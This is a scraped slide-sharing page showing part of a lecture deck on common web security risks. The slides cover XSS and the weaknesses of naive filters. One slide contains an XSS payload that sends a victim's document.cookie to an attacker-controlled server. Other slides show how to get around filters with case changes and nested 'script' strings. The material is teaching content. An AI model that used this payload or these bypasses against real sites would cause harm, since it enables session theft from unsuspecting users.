Video Converter
Audio Converter
Image Converter
PDF Converter
File Compressor
eb security

eb Security Software Studio yslin@DataLAB 1 Common Security - PowerPoint PPT Presentation

Sep 19, 2023 •231 likes •1.66k views

eb Security Software Studio yslin@DataLAB 1 Common Security Risks Brute-Force Attacks SQL Injections Cross-Site Scripting (XSS) Cross-Site Request Forgery (CSRF) 2 Common Security Risks Brute-Force Attacks SQL

  1. 確定 http://somewebsite.com/showimage?id=<script>al… You are watching an image with id = meow 58

  2. Hi~ Hello~ A cute cat !! http://goo.gl/abcdef 59

  3. Hi~ Hello~ A cute cat !! http://goo.gl/abcdef http://somewebsite.com/showimage? id=<script>location.href=(“http://myserver.com/ somepage?cookie=" + document.cookie);</script> 59

  4. WTF x 2 60

  5. Cross-Site Scripting 61

  6. Cross site to retrieve sensitive data Cross-Site Scripting 61

  7. Cross site to retrieve sensitive data Cross-Site Scripting Using scripts to attack 61

  8. How To Defense ? 62

  9. 1. Filtering 63

  10. 1. Filtering Lots of filtering methods 63

  11. 1. Filtering Lots of filtering methods But, there are also lots of ways to bypass 63

  12. Filtering Method 1 Removing all <script> words 64

  13. Filtering Method 1 Removing all <script> words But using <SCRIPT> will be safe. 64

  14. Filtering Method 2 Replace all script 65

  15. Filtering Method 2 Replace all script But, <scscriptript> becomes <script> 65

  16. Learning Filtering Methods • Some practice websites • alert(1) to win • If you cannot see the page, try to replace ‘https’ with ‘http’ • prompt(1) to win 66

Recommend

DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and

DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and

DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and Security DNS and

863 views • 71 slides
Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security Foundations: what is security? cryptography authentication message integrity key distribution and certification Security in practice:

648 views • 36 slides
Security, Security, Security Presentation to NSAI Consultation Meeting Chinese National Body

Security, Security, Security Presentation to NSAI Consultation Meeting Chinese National Body

Chinese NB presentation: Security, Security, Security Dublin, Ireland, Feb. 22, 2006 Security, Security, Security Presentation to NSAI Consultation Meeting Chinese National Body Feb. 22, 2006 Thank you Mr. Chairman, Chinese National

240 views • 7 slides
UCP GROUP Maritime Security Services UCP GROUP ONE SOLUTION ONE PLATFORM ONE SECURITY SERVICE

UCP GROUP Maritime Security Services UCP GROUP ONE SOLUTION ONE PLATFORM ONE SECURITY SERVICE

UCP GROUP Maritime Security Services UCP GROUP ONE SOLUTION ONE PLATFORM ONE SECURITY SERVICE Maritime Security - Commercial Shipping Security - Cruise Liner Security - Super-Yacht Security Maritime Security Services UCP GROUP is a market

253 views • 22 slides
Xpanda security gates Security solutions Retail security gate solutions Industrial

Xpanda security gates Security solutions Retail security gate solutions Industrial

STOREFRONT PROTECTION Xpanda security gates Security solutions Retail security gate solutions Industrial security gate solutions Institutional security gate solutions Access control security gate solutions Office building

407 views • 13 slides
A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security Introducing Spring Security View layer security Whats coming in Spring Security 3 E-mail: craig@habuma.com Blog: http://www.springloaded.info

457 views • 19 slides
OS Security Thierry Sans Security is a wide topic CSCD27 Computer and Network Security covers

OS Security Thierry Sans Security is a wide topic CSCD27 Computer and Network Security covers

OS Security Thierry Sans Security is a wide topic CSCD27 Computer and Network Security covers Cryptography Network security System security Web security (recap) Protection File systems implement a protection system Who

803 views • 30 slides
CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC 410 / 611 : Operating Systems CPSC410/611: Security Security Security Attacks Security Threats Crypto Authentication Examples SSL Security Threats Breach of confidentiality unauthorized access to

462 views • 18 slides
SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS Few Security Breaches Date: 2013-14 September 2016, while in negotiations to

408 views • 18 slides
CS 480/ 557 Computer Security I ntroduction to I nf ormation 1. Physical Security 2.Human

CS 480/ 557 Computer Security I ntroduction to I nf ormation 1. Physical Security 2.Human

Overview CS 480/ 557 Computer Security I ntroduction to I nf ormation 1. Physical Security 2.Human Security 3.Program Security Security Computer security threats Unintentional: - Coding faults - Operational faults -

241 views • 8 slides
Xpanda security products The gate way to peace of mind Retail security gate solutions

Xpanda security products The gate way to peace of mind Retail security gate solutions

Xpanda Security Products Presentation Xpanda security products The gate way to peace of mind Retail security gate solutions Industrial security gate solutions Institutional security gate solutions Access control security gate

491 views • 13 slides
Retail security gate solutions Industrial security gate solutions Institutional

Retail security gate solutions Industrial security gate solutions Institutional

PHYSICAL SECURITY SOLUTIONS Quantum security gates can help you improve security quickly. Before or after a break-in. Retail security gate solutions Industrial security gate solutions Institutional security gate solutions Office

219 views • 18 slides
Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security WS 06/07 Seminar Prof. Dr.-Ing. Jana Dittmann &amp; Dr.-Ing. Claus Vielhauer with support from Tobias Scheidat

421 views • 16 slides
Election Security and Integrity What is election security? What is election integrity? Election

Election Security and Integrity What is election security? What is election integrity? Election

Election Security and Integrity What is election security? What is election integrity? Election Security = Physical Security + Cybersecurity Physical Security Security plans Secure storage of voting machines and electronic pollbooks

346 views • 13 slides
Computer Security Foundations What is Security? Attacker Assets Threat Counter- measure

Computer Security Foundations What is Security? Attacker Assets Threat Counter- measure

IN3210 Network Security Computer Security Foundations What is Security? Attacker Assets Threat Counter- measure Computer Security Security of computers and networks Protection of digital assets Axioms of Computer Security:

244 views • 23 slides
Outline Security Principles and Policies Security terms and concepts CS 239 Security

Outline Security Principles and Policies Security terms and concepts CS 239 Security

Outline Security Principles and Policies Security terms and concepts CS 239 Security policies Computer Security Basic concepts Peter Reiher Security policies for real systems January 13, 2005 Lecture 2 Lecture 2 Page 1

351 views • 9 slides
Web Security Thierry Sans Securing the web architecture means securing ... The network

Web Security Thierry Sans Securing the web architecture means securing ... The network

Web Security Thierry Sans Securing the web architecture means securing ... The network The operating system The web server ( Apache for instance) The administration server ( SSH for instance) The database ( Oracle for instance)

1.38k views • 61 slides
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall

Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall

Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised of - HTML - JavaScript - Style

1.67k views • 129 slides
VOTD: XSS &amp; CSRF Engineering Secure Software Last Revised: September 8, 2020 SWEN-331:

VOTD: XSS &amp; CSRF Engineering Secure Software Last Revised: September 8, 2020 SWEN-331:

VOTD: XSS &amp; CSRF Engineering Secure Software Last Revised: September 8, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 What is XSS? XSS: Cross Site Scripting Injecting malicious scripts into a web page CWE-79

772 views • 12 slides
Locking the Throne Room How ES5+ might change views on XSS and Client Side Security A

Locking the Throne Room How ES5+ might change views on XSS and Client Side Security A

Locking the Throne Room How ES5+ might change views on XSS and Client Side Security A presentation by Mario Heiderich, 2011 Introduction Mario Heiderich Researcher and PhD student at the Ruhr-University, Bochum Security Researcher

550 views • 40 slides
SSP - Web Security with Adam &amp;amp; Ryan &lt;;'&quot;}()[]&gt;{ XSSFish says, &quot;Swim wif

SSP - Web Security with Adam &amp;amp; Ryan &lt;;'&quot;}()[]&gt;{ XSSFish says, &quot;Swim wif

SSP - Web Security with Adam &amp;amp; Ryan &lt;;'&quot;}()[]&gt;{ XSSFish says, &quot;Swim wif us&quot; Todays Topics Sessions Why do we need them? What weaknesses can attackers take advantage of? Cross-site Scripting

384 views • 37 slides
Internet Security [1] VU 184.216 Engin Kirda engin@infosys.tuwien.ac.at Christopher Kruegel

Internet Security [1] VU 184.216 Engin Kirda engin@infosys.tuwien.ac.at Christopher Kruegel

Internet Security [1] VU 184.216 Engin Kirda engin@infosys.tuwien.ac.at Christopher Kruegel chris@auto.tuwien.ac.at Outline Web Application Security, Part II Today, we continue from where we left last time. We look at further

508 views • 35 slides
CS1520 Recitation: Security in Flask Jeongmin Lee Slide contents based on a post by Damyan

CS1520 Recitation: Security in Flask Jeongmin Lee Slide contents based on a post by Damyan

CS1520 Recitation: Security in Flask Jeongmin Lee Slide contents based on a post by Damyan Bogoev at: https://damyanon.net/post/flask-series-security/ Plan for Today XSS (Cross Site Scripting) CSRF (Cross-Site Request Forgery) SQL

628 views • 28 slides
iLab2 WWW and Application Layer Security with friendly support by P. Laskov, Ph.D., University

iLab2 WWW and Application Layer Security with friendly support by P. Laskov, Ph.D., University

Chair for Network Architectures and Services Department of Informatics TU Mnchen Prof. Carle iLab2 WWW and Application Layer Security with friendly support by P. Laskov, Ph.D., University of Tbingen Recap: Internet Protocol Suite

757 views • 41 slides

More recommend

Explore More Topics

Stay informed with curated content and fresh updates.

animals pets art culture automotive transportation business finance computer internet construction architecture education-career electronics communication

Logo Sambuz

Unleash a World of Digital Possibilities—Browse, Share, and Explore Content Without Boundaries

Useful Links

About Us Privacy Services FAQ's Contact

Newsletter

Stay Informed & Inspired—Subscribe for the Latest Updates, Tips, and Exclusive Content Directly to Your Inbox.

Mail Us

mail@sambuz.com

2026 SAMBUZ, All right reserved.